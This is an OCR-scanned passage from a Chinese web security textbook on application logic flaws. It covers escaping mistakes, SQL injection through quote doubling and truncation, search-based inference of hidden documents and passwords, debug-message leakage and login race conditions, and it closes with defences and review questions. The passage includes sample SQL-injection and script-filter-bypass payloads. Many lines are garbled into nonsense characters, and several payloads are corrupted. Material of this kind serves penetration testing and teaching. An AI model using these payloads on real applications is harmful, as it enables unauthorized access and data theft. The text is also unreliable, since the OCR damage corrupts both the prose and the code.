用 命令 的 自 变量 的 一 部 分 ， 而 非 shell 元 字符 。 后 者 可 用 于 注入 其 他 命令 
或 自 变 量 、 重 定向 输出 等 。 

2. 假设 

开发 者 确信 ， 他 们 设计 的 方法 可 有 效 防 御 命 令 注 入 攻击 。 他 们 考虑 
到 了 每 一 个 可 能 被 攻击 者 利用 的 字符 ， 并 确保 对 它们 进行 了 适当 的 转 义 
处 理 ， 因 而 它们 不 会 造成 风险 。 

3. WHA 

开发 者 访 记 了 对 转 义 字符 本 身 进行 转 义 。 











HLS» KhA EA A tl) BLP cate EA lad SS PAS E AEH DS ER 
因此 开发 者 认为 它 并 非 恶 意 字符 。 然 而 ， 正 是 由 于 没有 对 它 进行 转 义 ， 
攻击 者 束 可 以 完全 破坏 应 用 程序 的 净化 机 制 。 

假设 攻击 者 向 易 受 攻击 的 功能 提交 以 下 输入 : 


yy Ns LS 


ee pe er E 








Tools 


当 这 个 数据 作为 目 变 量 提 区 给 操作 系统 命令 时 ，shell 解释 占 把 第 一 
个 反 斜 线 作 为 转 义 字符 ， 而 把 第 二 个 反 斜 线 当做 字面 量 反 斜 线 处 理 ， 反 
和 斜 线 不 是 一 个 转 义 字符 ， 而 是 自 变 量 的 一 部 分 。 然 后 它 过 到 分 号 字符 ， 
该 字符 明显 没有 进行 转 义 。 解 释 器 把 分 号 作为 一 个 命令 分 隔 符 ， 因 此 继 
续 执 行 攻击 者 注入 的 命令 。 





渗透 测试 步 又 


当 在 应 用 程序 中 探查 命令 注入 及 其 他 缺陷 时 ， 答 试 在 受 控 制 的 
数据 中 插入 相关 元 字符 后 ， 接 着 在 每 个 元 字符 前 插入 一 个 有 反 斜 线 ， 
测试 前 面 描述 的 逻辑 缺陷 。 





wo 

wg 

=> 注解 一些 防 御 跨 站 点 脚本 攻击 (请 参阅 第 12 章 了 解 相关 
内 容 ) 的 措施 中 也 存在 这 种 的 逻辑 缺陷 。 将 用 户 提 交 的 输入 直接 复 
制 到 一 段 JavaScript 脚 本 的 字符 串 变 量 值 中 时 ， 这 个 值 包 含 在 引号 
内 。 为 防御 跨 站 点 脚本 攻击 ， 许 多 应 用 程序 使 用 反 斜 线 对 出 现在 用 
户 输入 中 的 引号 进行 转 义 。 然 而 ， 如 果 反 和 斜 线 本 有 身 并 没有 转 义 ， 那 
么 攻击 者 就 可 以 提交 \ 破 坏 字 符 串 ， 从 而 控制 脚本 。 早 先 厂 本 的 

Ruby On Rails 框架 的 escape_javascript 函 数 中 就 存在 这 种 漏洞 。 











11.2.9 #9: 避 开 输入 确 ? 


笔者 曾 在 一 个 电子 商务 站 点 的 Web 应 用 程序 中 发 现 这 种 逻辑 缺陷 。 
oa a 

1， 功 能 

该 应 用 程序 包含 一 组 输入 确认 程序 ， 以 防范 各 种 类 型 的 攻击 。 其 中 
的 两 种 防御 机 制 为 SQL 注入 过 滤 和 长 度 限 制 。 

通常 ， 应 用 程序 对 在 基于 字符 串 的 用 户 输入 中 出 现 的 任何 单 引号 进 
行 转 义 (并 拒绝 在 数字 输入 中 出 现 的 任何 单 引号 ) ， 以 防范 SQL 注 入 。 
如 第 9 章 所 述 ， 两 个 单 引 号 在 一 起 将 构成 一 个 转 义 序列 ， 表 示 一 个 原 义 
单 引 号 ， 数 据 库 会 将 其 解释 为 引用 字符 串 中 的 数据 ， 而 不 是 结束 字符 串 
的 终止 符 。 因 此 ， 许 多 开发 者 认为 ， 通 过 将 用 户 提 交 的 输入 中 的 任何 单 
引号 配对 ， 就 可 以 防止 SQL 注入 攻击 。 

长 度 限 制 适用 于 所 有 输入 ， 确 保 用 户 提交 的 变量 不 会 超过 128 个 字 
符 。 如 果 任 何 变 量 超过 128 个 字符 ， 它 会 将 其 截 短 。 











2. Eri 

从 安全 的 角度 来 说 ，SQL 注 入 过 滤 和 长 度 限 制 都 属于 适当 的 防御 机 
制 ， 因 此 两 种 防御 机 制 都 应 该 采用 。 

3. 攻击 方法 

SQL 注入 防御 通过 将 用 户 输入 中 的 任何 引号 配对 而 生效 ， 因 此 ， 在 
每 对 引号 中 ， 第 一 个 引号 将 作为 第 二 个 引号 的 转 义 字符 。 但 是 ， 开 发 者 
机 
么 情况 。 

回 到 第 9 章 中 的 登录 功能 SQL 注入 示例 。 假 设 应 用 程序 将 用 户 输入 
中 的 任何 单 引 号 配对 ， 然 后 对 该 数据 实施 长 度 限 制 ， 将 其 截 短 为 128 个 
字符 。 如 果 提 交 以 下 用 户 名 : 





admin'-- 
将 导致 以 下 无 法 避 开 登录 的 查询 : 
SELECT * FROM users WHERE username = ‘acmin''--' and password = '' 


但 是 ， 如 果 提 交 以 下 用 户 名 (包含 127 个 a 后 接 一 个 单 引 与 ) : 
aaaaaaaa(...j]aaaaaaaaaaa' 


应 用 程序 会 首先 将 单 引号 配对 ， 然 后 将 字符 串 截 短 为 128 个 字符 ， 
导致 输入 又 恢复 其 原始 值 。 这 时 会 生成 数据 库 错 误 ， 因 为 在 查询 中 注入 
了 另外 一 个 单 引 号 ， 而 没有 纠正 周围 的 语法 。 此 时 如 果 提 交 密 码 : 





= 
应 用 程序 将 执行 以 下 查询 ， 从 而 成 功 避 开 登 录 : 
SELECT * FROM users WHERE username = 'aaaaaaaa[...]Jaaaaaaaaaaa'' and 
password = ‘or 1=] 








由 a 组 成 的 字符 串 末 尾 的 已 配对 引号 将 被 解释 为 转 义 引 写 ， 因 而 被 
作为 查询 数 据 的 一 部 分 。 这 个 字符 串 将 继续 有 效 ， 直 到 下 一 个 单 引 号 位 
置 结束 ， 而 在 原始 的 查询 中 ， 这 个 位 置 为 用 户 提 区 的 密码 值 的 开始 音 
分 。 这 样 ， 数 据 库 理解 的 用 户 名 为 如 下 所 示 的 字符 串 数 据 : 


aaaaaaaa[...]aaaaaaaaaaa'and password = 


因此 ， 之 后 的 任何 内 容 均 被 解释 为 查询 的 一 部 分 ， 因 而 可 以 进行 专 
门 设计 以 破坏 碍 询 逻 辑 。 


YY BR ”不必 清 楚 了 解 应 用 程序 实施 的 长 度 限 制 ， 只 需 轮流 
提交 下 面 的 两 个 长 字符 串 ， 并 确定 是 否 会 生成 错误 ， 即 可 测试 这 种 
类 型 的 漏洞 : 


Ase Ite 偶数 或 奇数 个 字符 之 后 发 生 。 无 论 是 哪 一 种 情 
况 ， 以 上 其 中 一 个 字符 串 将 导致 在 查询 中 插入 奇数 数量 的 单 引 号 ， 
从 而 生成 无 效 的 语法 。 


渗透 测试 步 又 


记 下 应 用 程序 修改 用 户 输 入 特别 是 截 短 、 删 除数 据 、 编 码 或 
解码 的 任何 位 置 。 对 于 观察 到 的 每 一 个 位 置 ， 确 定 是 人 否 可 以 人 为 
构造 恶意 字符 串 。 

(1) 如 采 数 据 已 被 过 滤 一 次 《〈 非 递归 ) ， 确 定 是 否 可 以 提交 
一 个 “补偿 ”过滤 操 作 的 字符 串 。 人 例如， 如果 应 用 程序 过 滤 SELECT 
这 个 SQL 关键 字 ， 则 可 以 提交 SELSELECTECT， 看 过 滤 机 制 是 否 
会 删除 其 中 的 SELECT 子 字 符 串 ， 而 留 下 SELECT。 

(2) 如 果 数 据 确认 按 设 定 的 顺序 发 生 ， 并 且 有 一 个 或 多 个 确 
认 步 又 修改 了 数据 ， 则 确定 是 否 可 以 将 这 些 步 又 用 于 破坏 之 前 的 确 
认 步 又 。 例 如 ， 如 果 应 用 程序 执行 URL 编 码 ， 然 后 过 滤 掉 悉 意 数据 
a aa 
J] e 

$<script>3cscript%<script>3ealert (1)%<script>3c/ 

script%<script>3e 


ey 


> 注解 ” 跨 站 点 脚本 过 滤 经 常会 错误 地 删除 HTML 标 签 对 之 
间 的 所 有 数据 ， 如 <tag1>aaaaa</tag1>。 这 种 行为 通常 易于 受到 上 述 
攻击 。 





11.2.10 110: hi 功能 


我 们 曾 在 一 个 提供 基于 预订 的 金融 新 闻 和 信息 访问 的 应 用 程序 中 发 
现 过 这 种 逻辑 缺陷 。 随 后 ， 我 们 义 在 两 个 完全 无 关 的 应 用 程序 中 过 到 相 
Be 

1. 功能 

应 用 程序 允许 用 户 访 问 大 量 的 历史 档案 与 当前 信息 ， 包 括 公司 报表 





与 账目 、 新 闻 稿 、 市 场 分 析 等 。 大 部 分 信息 只 有 付费 用 户 才 可 查阅 。 

应 用 程序 提供 一 个 功能 强大 、 分 类 详细 的 搜索 功能 ， 所 有 用 户 都 可 
使 用 这 项 功能 。 如 果 匿 名 用 户 执 行 一 项 查询 ， 搜 索 功 能 将 返回 所 有 与 查 
询 相 匹配 的 文档 链接 。 然 而 ， 如 果 用 户 想 要 查看 查询 返回 的 受 保护 文档 
的 实际 内 容 ， 束 需要 付费 订阅 。 应 用 程序 的 所 有 者 认为 这 种 行为 是 一 种 
有 用 的 营销 策略 。 

2. 假设 

应 用 程序 的 设计 者 认为 ， 如 果 用 户 不 付费 订阅 ， 就 无 法 使 用 搜索 功 
能 提取 任何 有 用 的 信息 。 搜 索 结果 返回 的 文档 标题 往往 含义 模糊 ， 例 
如 ，“2010 年 度 报告 " “新闻 稿 08-03-2011” 等 。 

3. 攻击 方法 

因为 搜索 功能 指出 与 某 一 查询 匹配 的 文档 数量 ， 狭 独 的 用 户 就 可 以 
提交 大 量 碍 询 ， 并 通过 推 新 利用 搜索 功能 提取 正常 情况 下 需要 付费 才能 
查阅 的 信息 。 例 如 ， 下 面 的 查询 可 从 一 个 受 保护 的 文档 中 提取 内 容 。 


ann consulting 











>> 276 matches 

wahh consulting "Press Release 08-03-2011" merger 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" share issue 

>> 0 matches 

wahh consulting *Press Release 08-03-2011" dividend 
0 matches 

wahh consulting "Press Release 08-03-2911" takeover 

>> 1 match 

wanh consulting *Press Release 08-03-2011" takeover haxors inc 

>> 9 matches 

wahh consulting "Press Release 68-03-2011" takeover uberleet ltd 
0 matches 

wanh consulting "Press Release 08-03-2011" takeover script kiddy corp 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover ngs 

>> 1 match 

wahh consulting “Press Release 08-03-2011" takeover ngs anncunced 

> 0 matches 


wahh consulting "Press Release 08-03-2911" takeover nas cancelled 


matches 
wahh consulting "Press Release 08-03-2011" takeover ngs completed 


虽然 用 户 不 能 查看 文档 的 具体 内 容 ， 但 通过 发 挥 充分 的 想象 并 使 用 
有 针对 性 的 请 求 ， 他 就 能 够 相对 清楚 地 了 解 文档 的 内 容 。 








W 提示 ”在 某 些 情况 下 ， 能 够 以 这 种 方式 通过 搜索 功能 过 滤 
信息 ， 对 应 用 程序 的 安全 非常 重要 : 它 会 披露 大 量 与 管理 功能 、 密 
码 和 采用 的 技术 有 关 的 信息 。 





Vo ”提示 事实 证 明 ， 使 用 这 种 技巧 可 对 内 部 文档 管理 软件 实 
施 有 效 攻击 。 笔 者 曾 采 用 此 技巧 对 存储 在 维基 百科 中 的 配置 文件 内 
的 关键 密码 实施 过 蛮 力 攻击 。 由 于 维基 百科 会 返回 提示 ， 说 明 搜 索 
字符 串 是 否 出 现在 页 面 的 任何 位 置 《 而 不 是 匹配 整个 单词 》 A 
此 ， 可 以 通过 搜索 以 下 内 容 ， 逐 个 字母 地 对 密码 实施 蛮 力 攻击 : 














Password=A 
Password=B 
Password=BA 








我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 中 发 现 过 这 种 逻辑 








功能 有 关 的 缺陷 。 每 隔 一 段 时 间 ， 应 用 程序 的 各 种 操作 就 会 意外 中 断 ， 
并 回 用 户 返 回 一 条 错误 消息 。 
为 方便 错误 调查 ， 开 发 者 决定 在 这 些 消息 中 提供 详尽 的 信息 ， 包 
口 用 户 的 身份 ; 
口 当前 会 话 的 令 牌 ; 
口 被 访问 的 URL; 


口 在 造成 错误 的 请 求 中 提交 的 所 有 参数 。 

提供 这 些 消息 对 服务 台 工 作 人 员 调 查 并 恢复 系统 故障 非常 有 用 ， 而 
且 有 助 于 消除 剩 下 的 功能 缺陷 。 

2. 假设 

尽管 安全 顾问 经 常 提 出 警告 ， 称 这 种 详尽 的 调试 消息 可 能 会 被 攻击 
者 小 用， 但 开发 者 仍然 认为 它们 不 会 造成 任何 安全 漏洞 。 通 过 检查 浏览 
器 处 理 的 请 求 与 啊 应 ， 用 户 就 有 可 能 获得 调试 消息 中 包含 的 所 有 信息 。 
但 是 ， 这 些 消 息 中 并 未 包含 与 实际 故障 有 关 的 任何 细节 〈 如 栈 跟踪 ) ， 
因此 无 法 帮助 攻击 者 疝 应 用 程序 发 动 有 效 攻击 。 

3. 攻击 方法 

尽管 开发 者 对 调试 消息 的 内 容 进 行 了 合理 保护 ， 但 由 于 他 们 在 创建 
调试 消息 时 犯 下 的 错误 ， 假 设 仍 然 存 在 缺陷 。 

当 错 误 发 生 时 ， 应 用 程序 的 一 个 组 件 将 收集 所 有 必要 的 信息 ， 并 将 
其 保存 起 来 。 用 户 收 到 一 个 HTTP 重 定向 ， 它 指向 一 个 显示 这 些 被 保存 
信息 的 URL。 问 题 在 于 ， 在 应 用 程序 保存 调试 信息 、 用 户 访问 错误 消息 
时 ， 并 没有 使 用 会 话 。 相 反 ， 调 试 信息 被 保存 在 一 个 静态 容器 内 ， 并 且 
错误 消息 UREL 总 显示 最 后 放 入 这 个 容器 的 信息 。 因 此 ， 开 发 者 认为 ， 使 
用 重 定 癌 的 用 户 只 会 看 到 与 错误 有 关 的 调试 信息 。 

实际 上 ， 在 这 种 情况 下 ， 如 果 两 个 错误 几乎 同时 发 生 ， 普 通用 户 侦 
尔 会 看 到 与 另 一 名 用 户 造 成 的 错误 有 关 的 调试 信息 。 除 线程 安全 问题 外 
〈 见 下 一 个 示例 ) ， 这 并 非 一 个 简单 的 竞 态 条 件 。 如 果 攻 击 者 知道 错误 
机 制 的 工作 原理 ， 他 就 可 以 重复 访问 消息 URL， 并 记录 下 所 有 不 同 的 错 
fee eae era earl een eer neem 

口 一 组 可 用 在 密码 猜测 攻击 中 的 用 户 名 ; 

口 一 组 可 用 于 支持 会 话 的 会 话 令 牌 ; 

口 一 组 用 户 提 交 的 输入 ， 其 中 包含 密码 和 其 他 敏感 数据 。 

因此 ， 错 误 机 制 可 能 会 造成 严重 的 安全 威胁 。 由 于 管理 用 户 有 时 会 
收 到 这 类 内 容 详细 的 错误 消息 ， 监 控 错 误 消 息 的 攻击 者 就 可 以 迅速 获得 
足够 的 信息 ， 从 而 攻破 整个 应 用 程序 。 



































渗透 测试 步 又 


(1) 为 探查 这 种 缺陷 ， 首 先 列 出 应 用 程序 中 可 能 出 现 的 反常 
事件 和 条 件 ， 以 及 以 非常 规 方式 辐 浏 览 费 返回 有 用 的 用 户 信息 的 情 
况 ， 如 返回 调试 错误 消 妃 。 

(2) 同时 以 两 名 用 户 的 名 义 使 用 应 用 程序 ， 使 用 一 名 或 两 名 
用 户 系 统 性 地 创造 每 一 个 条 件 ， 并 确定 另 一 名 用 户 是 个 受到 影响 。 








11.2.12 例 12: 与 登 ; EE- 
最 近 ， 这 种 人 逻辑 缺陷 给 几 个 大 型 应 用 程序 造成 了 严重 威胁 。 
1. 功能 


应 用 程序 执行 采用 一 种 安全 、 多 阶段 的 登录 机 制 ， 要 求 用 户 提交 几 
个 不 同 的 证 书 才 能 获得 访问 权限 。 

2. 假设 

验证 机 制 接 受 了 大 量 设计 审查 与 渗透 测试 。 应 用 程序 的 所 有 者 确 
信 ， 攻 击 者 无 法 癌 验 证 机 制 发动 有 效 攻 击 ， 从 而 获得 未 授权 访问 。 

3. 攻击 方法 

实际 上 ， 验 证 机 制 存在 一 个 细小 的 缺陷 。 有 了 时， 顾客 登录 后 ， 他 可 
以 访问 另外 一 名 用 户 的 账户 ， 查 看 该 用 户 的 所 有 金融 信息 ， 甚 至 使 用 其 
他 用 户 的 账户 进行 支付 。 最 初 ， 应 用 程序 的 行为 完全 是 随机 性 的 ， 在 获 
得 未 授权 访问 之 前 ， 用 户 并 没有 执行 任何 非法 操作 ;再 次 登录 时 ， 反 凶 
现象 也 不 会 重复 出 现 。 

经 过 一 些 调查 ， 银 行 发 现 ， 如 果 两 个 不 同 的 用 户 在 同一 时 间 登 录 ， 
就 会 出 现 错误 。 而 且 ， 并 不 是 每 次 出 现 这 种 情况 都 会 发 生 错误 〈 仅 在 少 
数 情况 下 错误 才 会 发 生 ) 。 友 生 这 种 错误 的 根本 原因 在 于 ， 应 用 程序 将 
与 新 近 通 过 验证 的 用 户 有 关 的 标识 符 临 时 保存 在 一 个 静态 〈 非 会 话 ) 变 
量 中 。 改 写 这 个 值 不 久 后 ， 应 用 程序 再 读 取 这 个 变量 的 值 。 如 果 在 这 个 
过 程 中 有 另外 一 个 线程 〈 处 理 另 一 个 登录 ) 写 入 到 变量 中 ， 早 先 登 录 的 
用 户 就 会 分 配 到 属于 随后 登录 的 用 户 的 会 话 。 

这 种 漏洞 源 于 与 前 面 错误 消息 示例 中 相同 的 错误 : 应 用 程序 使 用 静 
态 存储 保存 应 根据 独立 线程 或 会 话 保存 的 信息 。 然 而 ， 由 于 这 类 错误 不 























会 反复 出 现 ， 当 前 示例 中 的 缺陷 更 难 发 现 ， 也 更 难 对 其 加 以 利用 。 

这 种 缺陷 叫做 “* 竞 态 条 件 >， 因 为 其 中 的 漏洞 仅 在 某 些 特殊 情况 下 才 
会 出 现 ， 而 且 存 在 时 间 很 短 。 由 于 漏洞 仅 在 短 时 间 内 存在 ， 攻 击 者 面临 
着 一 次 “竞赛 "， 必 须 赶 在 应 用 程序 关闭 它 之 前 对 其 加 以 利用 。 如 果 攻 击 
者 是 应 用 程序 的 本 地 用 户 ， 他 就 有 可 能 知道 竞 态 条 件 出 现 的 具体 情景 ， 
人 
就 比较 困难 。 

如 果 远 程 攻击 者 了 解 到 这 种 漏洞 的 本 质 ， 那 么 他 就 可 以 通过 使 用 一 
段 脚 本 连续 进行 登录 ， 并 查看 被 访问 账户 的 详细 资料 ， 从 而 设计 出 有 效 
的 攻击 方法 。 但 是 ， 由 于 这 种 漏洞 可 被 利用 的 时 间 极 短 ， 攻 击 者 可 能 需 
要 提交 数目 庞大 的 请 求 。 

鉴于 以 上 原因 ， 我 们 在 正常 渗透 测试 过 程 中 没有 发 现 竞 态 条 件 也 就 
不 足 为 怪 了 。 只 有 当 应 用 程序 的 用 户 数量 足够 庞大 、 可 导致 反常 现象 
《由 顾客 上 报 ) 发 生 时 ， 这 种 条 件 才 会 出 现 。 然 和 而， 如果 对 验证 与 会 话 
管理 逻辑 进行 严格 的 代码 审查 ， 还 是 有 可 能 发 现 此 类 问题 。 




















渗透 测试 步 又 


进行 远程 < 黑 盒 测试 得 找 这 类 细微 的 线程 安全 问题 非常 肪 烦 ， 
应 被 视 为 一 项 专门 任务 ， 只 有 极其 注重 安全 的 应 用 程序 才 需 要 进行 
这 种 测试 。 

C1) 针对 选择 的 关键 功能 进行 测试 ， 如 登录 机 制 、 密 码 修改 
功能 与 转账 过 程 。 

(2) 对 每 一 项 测试 的 功能 ， 确 定 茶 位 用 户 在 执行 一 项 操作 时 
需要 提交 一 个 或 少数 几 个 请 求 。 同 时 ， 找 到 确定 操作 结果 的 最 简单 
方法 ， 例 如 ， 核 实用 户 登 录 后 是 否 能 够 得 看 他 们 目 己 的 账户 信息。 

(3) 使 用 几 人 台 高 规格 的 机 器 ， 从 不 同 的 网 络 位 置 访问 应 用 程 
序 ， 写 出 一 段 攻击 脚本 ， 代 表 儿 名 不 同 的 用 户 反 复 执行 相同 的 操 
作 。 确 定 每 项 操作 是 人 否 达到 预期 的 结果 。 

(4) 为 接收 大 量 错误 警报 做 好 准备 。 根 据 为 应 用 程序 提供 文 
持 的 基础 架构 的 规模 ， 可 能 需要 对 安装 的 软件 进行 负载 测试 。 有 
时 ， 反 管 现象 可 能 与 安全 无 关 。 





























11.3 HFIS FE RS 


就 像 无 法 通过 明确 的 特征 确定 Web 应 用 程序 中 存在 的 逻辑 缺陷 一 
样 ， 同 样 也 没有 能 够 保护 应 用 程序 的 万 能 防御 措施 。 例 如 ， 虽 然 无 法 找 
到 安全 的 方法 蔡 代 危险 的 API， 但 是 ， 下 面 的 一 系列 最 佳 实践 可 显著 降 
低 在 应 用 程序 中 出 现 逻 辑 缺 陷 造 成 的 风险 。 

口 确保 将 应 用 程序 各 方面 的 设计 信息 清楚 、 详 细 地 记录 在 文档 中 ， 
以 方便 其 他 人 了 解 设 计 者 做 出 的 每 个 假设 。 同 时 将 所 有 这 些 假 设 明 确 记 
录 在 设计 文档 中 。 

口 要 求 所 有 源 代 码 提 供 清楚 的 注释 ， 包 括 以 下 信息 : 

m 每 个 代码 组 件 的 用 途 和 预计 用 法 ; 

m 每 个 组 件 对 它 无 法 直接 控制 的 内 容 做 出 的 假设 ; 

m 利用 组 件 的 所 有 客户 端 代码 引用 ， 清 楚 记 录 它 的 效 
果 有 助 于 阻止 在 线 注 册 功 能 中 的 逻辑 缺陷 。 QER: 
这 里 的 “客户 端 ? 不 是 指 客户 端 一 服务 器 关系 中 的 用 
户 ， 而 是 指 组 件 主要 依赖 的 代码 。) 

口 在 以 安全 为 中 心 的 应 用 程序 设计 审核 中 ， 考 虑 在 设计 过 程 中 做 出 
的 每 一 个 假设 ， 并 想象 假设 被 违背 的 每 种 情况 。 尤 其 应 注意 任何 应 用 程 
序 用 户 可 完全 控制 的 假定 条 件 。 

口 在 以 安全 为 中 心 的 代码 审查 中 ， 从 各 个 角度 考虑 以 下 两 个 因素 : 
应 用 程序 如 何 处 理 用 户 的 反常 行为 和 输入 ; 不 同 代码 组 件 与 应 用 程序 功 
能 之 间 的 相互 依赖 和 互 操作 可 能 造成 的 不 利 影响 。 

我 们 可 从 本 章 摘 述 的 特殊 逻辑 缺陷 实例 中 汲取 以 下 教训 。 

口 始终 记 住 ， 用 户 可 以 控制 请 求 每 一 个 方面 的 内 容 〈( 请 参阅 第 1 章 
了 解 相 关内 容 ) 。 他 们 可 以 按 任 何 顺序 访问 多 阶段 功能 ， 他 们 可 以 提交 
他 们 可 以 完全 省 略 某 些 参 数 ， 而 不 仅仅 是 算 
改 参 数值 。 

口 根 据 会 话 确定 用 户 的 身份 与 权限 〈 请 参阅 第 8 章 了 解 相 关内 
容 ) 。 不 要 根据 请 求 的 任何 其 他 特性 对 用 户 的 权限 做 出 任何 假设 。 

口 当 根 据 用 户 提交 的 数据 或 者 用 户 执 行 的 操作 更 新 会 话 数据 时 ， 仔 
细 考 虑 更 新 后 的 数据 可 能 会 给 应 用 程序 的 其 他 功能 造成 什么 影响 。 注 
意 ， 这 些 数据 可 能 会 给 由 其 他 程序 员 或 其 他 开发 团队 编写 的 完全 无 关 的 
功能 造成 意 想 不 到 的 不 利 影响 。 

口 如 果 一 项 搜索 功能 可 用 于 查询 禁止 某 些 用 户 访问 的 敏感 数据 ， 确 



































保 那 些 用 户 无 法 利用 该 项 功能 、 根 据 搜索 结果 推断 出 有 用 的 信息 。 如 果 
可 以 ， 根 据 不 同 的 用 户 权 限 保留 几 个 搜索 索引 (search index) ， 或 者 使 
用 当前 用 户 的 权限 进行 动态 信息 搜索 。 

口 如 有 果 一 项 功能 允许 用 户 从 审计 奶 踪 中 删除 任何 记录 ， 在 使 用 该 项 
功能 时 应 特别 小 心 。 男 外 ， 在 大 量 使 用 审计 的 应 用 程序 与 双重 授权 模型 
考虑 一 名 高 级 权限 用 户 创建 另 一 个 相同 权限 的 用 户 可 能 造成 的 影 
Hal 。 

口 如 果 应 用 程序 根据 数字 交易 限额 执行 检查 ， 在 处 理 用 户 输入 前 ， 
必须 对 所 有 数据 实施 严格 的 规范 化 与 数据 确认 。 如 果 没 有 考虑 到 使 用 负 
数 的 情况 ， 应 立即 拒绝 包含 负数 的 请 求 。 

口 如 果 应 用 程序 根据 订购 商品 的 数量 决定 折扣 ， 必 须 保 证 在 实际 应 
用 折扣 前 确定 订单 。 

口 如 果 在 将 用 户 提 交 的 数据 提交 给 可 能 易于 受到 攻击 的 应 用 程序 组 
件 前 ， 对 其 进行 转 义 处 理 ， 一 定 要 记得 对 转 义 字符 本 喘 进 行 转 义 ， 人 否则 
整个 确认 机 制 可 能 会 遭 到 破坏 。 

口 始终 使 用 适当 的 存储 方法 保存 与 菜 位 用 户 有 关 的 数据 (或 者 保存 
在 会 话 中 ， 或 者 保存 在 用 户 资 料 中 〉。 














11.4 ”小结 


当 攻 击 应 用 程序 的 逻辑 缺陷 时 ， 滩 透 测试 员 既 要 进行 系统 性 地 探 
但， 也 要 从 不 同 的 角度 思考 问题 。 如 前 所 述 ， 渗 透 测试 员 应 该 始终 执行 
各 种 关键 检查 以 确定 应 用 程序 在 收 到 反常 输入 后 的 行为 。 这 类 反常 输入 
包括 从 请 求 中 删除 参数 、 使 用 强制 浏览 不 按 预 定 顺 序 访问 功能 ， 以 及 癌 
应 用 程序 的 不 同位 置 提交 参数 。 通 章 ， 应 用 程序 啊 应 这 些 操作 的 方式 会 
反应 出 一 些 存在 缺陷 的 假设 ， 不 做 这 些 假 设 就 可 以 避免 造成 不 民 后 宋 。 

除了 这 些 基本 的 测试 外 ， 在 探查 逻辑 缺陷 时 面临 的 最 大 挑战 ， 是 如 
何 深入 了 解 开发 者 的 思维 方式 。 震 要 了 解 他 们 想 要 达到 什么 目的 、 可 能 
会 做 出 什么 假设 、 可 能 采用 哪些 捷径 、 将 会 犯 下 什么 错误 。 想 象 一 下 ， 
假设 完工 的 最 后 期 限 临近 ， 但 还 主要 担心 功能 而 非 安全 ， 试 图 在 现 有 代 
码 中 增加 一 项 新 功能 ， 或 者 需要 使 用 其 他 人 编写 的 质量 不 佳 的 API。 在 
那样 的 情况 下 ， 开 发 者 可 能 会 犯 什么 错误 ? 如 何 利 用 这 些 错误 ? 








11.5 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 

C1) 何 为 强制 浏览 ? 可 以 通过 它 确 定 哪些 漏洞 ? 

(2) 为 防止 不 同类 型 的 攻击 ， 应 用 程序 对 用 户 输入 实施 各 种 全 局 
过 滤 。 为 防止 SQL 注入 ， 它 将 出 现在 用 户 输入 中 的 单 引 号 配对 。 为 防止 
针对 一 些 本 地 代码 组 件 的 缓冲 区 洲 出 攻击 ， 它 将 超 长 的 数据 截 短 到 适当 
的 长 度 。 这 些 过 滤 有 什么 问题 ? 

(3) 可 以 采取 哪些 步 又 来 探查 某 登 录 功 能 中 是 否 存 在 故障 开放 条 
件 ? 《〈 列 出 想到 的 各 种 不 同 的 测试 。) 

(4) 某 银 行 应 用 程序 采用 一 种 非常 安全 可 靠 的 多 阶段 登录 机 制 。 
在 第 一 个 阶段 ， 用 户 输入 用 户 名 和 密码 。 在 第 二 个 阶段 ， 用 户 输 入 在 物 
理 令 牌 上 显示 的 一 个 不 断 变化 的 值 ， 并 通过 一 个 隐藏 表单 字段 重新 提交 
前 面 输入 的 用 户 名 。 

可 以 立即 发 现 的 逻辑 缺陷 有 哪些 ? 

(5) 在 通过 提交 专门 设计 的 输入 探查 一 个 应 用 程序 中 是 否 存在 常 
见 的 漏洞 时 ， 应 用 程序 频 索 返回 包含 调试 信息 的 详细 错误 消息 。 有 时 ， 
这 些 消息 与 其 他 用 户 造成 的 错误 有 关 。 这 种 情况 后 ， 就 无 法 令 其 再 次 发 
生 。 这 表示 应 用 程序 存在 什么 逻辑 缺陷 ， 接 下 来 该 如 何 处 理 ? 











攻击 其 > 


ZA 大 多 数 针对 Web 应 用 程序 的 攻击 主要 以 服务 器 端 应 用 程序 为 攻 
击 目 标 。 当 然 ， 许 多 这 类 攻击 会 侵害 到 其 他 用 户 ， 例 如 ， 盗 窃 其 他 用 户 
数据 的 SQL 注入 攻击 ， 但 是 ， 攻 击 考 所 使 用 的 基本 攻击 方法 是 以 无 法 和 
料 的 方式 与 服务 器 进行 交互 的 ， 目 的 是 执行 未 授权 操作 并 非法 访问 数 


据 。 

本 章 描 述 的 攻击 属于 另外 一 种 类 型 ， 因 为 攻击 者 的 主要 对 象 是 应 用 
程序 的 其 他 用 户 。 服 务 器 端 应 用 程序 仍然 存在 所 有 相关 漏洞 ; 然而， 攻 
击 者 利用 应 用 程序 的 一 些 行为 执行 针对 其 他 终端 用 户 的 恶意 操作 。 这 些 
操作 可 能 会 造成 一 些 与 前 面 分 析 过 的 攻击 相同 的 后 果 ， 如 会 话 劫 持 、 未 
授权 操作 和 披露 个 人 信息 ; 还 可 能 导致 其 他 恶果 ， 如 记录 键 击 或 在 用 户 
的 计算 机 上 执行 任意 命令 。 

近年 来 ， 软 件 安全 其 他 领域 的 关注 焦点 已 逐渐 由 服务 器 端 攻 击 转 变 
为 客户 端 攻 击 。 举 例 来 说 ，Microsoft 过 去 会 定期 宣布 其 服务 器 产品 中 存 
在 的 严重 安全 漏洞 。 虽 然 他 们 也 披露 大 量 客 户 端 缺 陷 ， 但 这 类 缺陷 很 少 
受到 关注 ;因为 对 攻击 者 而 言 ， 服 务 器 是 一 个 更 具 吸 引力 的 目标 。 仅 仅 
几 年 内 ， 这 种 情况 就 发 生 显著 改变 。 自 Microsoft 的 IIS 6 Web 服 务 器 首次 
发 布 以 来 ， 人 们 已 经 在 Microsoft Internet Explorer 浏 览 器 中 发 现 了 大 量 漏 
洞 。 随 着 人 们 对 安全 威胁 意识 的 普 壳 增强， 软件 开发 者 与 黑客 之 间 的 前 
沿 战场 已 经 由 服务 器 转 回 客户 端 。 

虽然 web 应 用 程序 安全 状况 尚未 发 生 上 述 巨大 的 转变 ， 但 也 出 现 了 
相同 的 趋势 。20 世 纪 90 年 代 末 ， 因 特 网 上 的 大 多 数 应 用 程序 中 充斥 着 命 


轻易 发 现 并 利用 这 些 弱点 。 尺 定 许 多 这 种 类 型 的 漏洞 今天 依然 存在 ， 但 
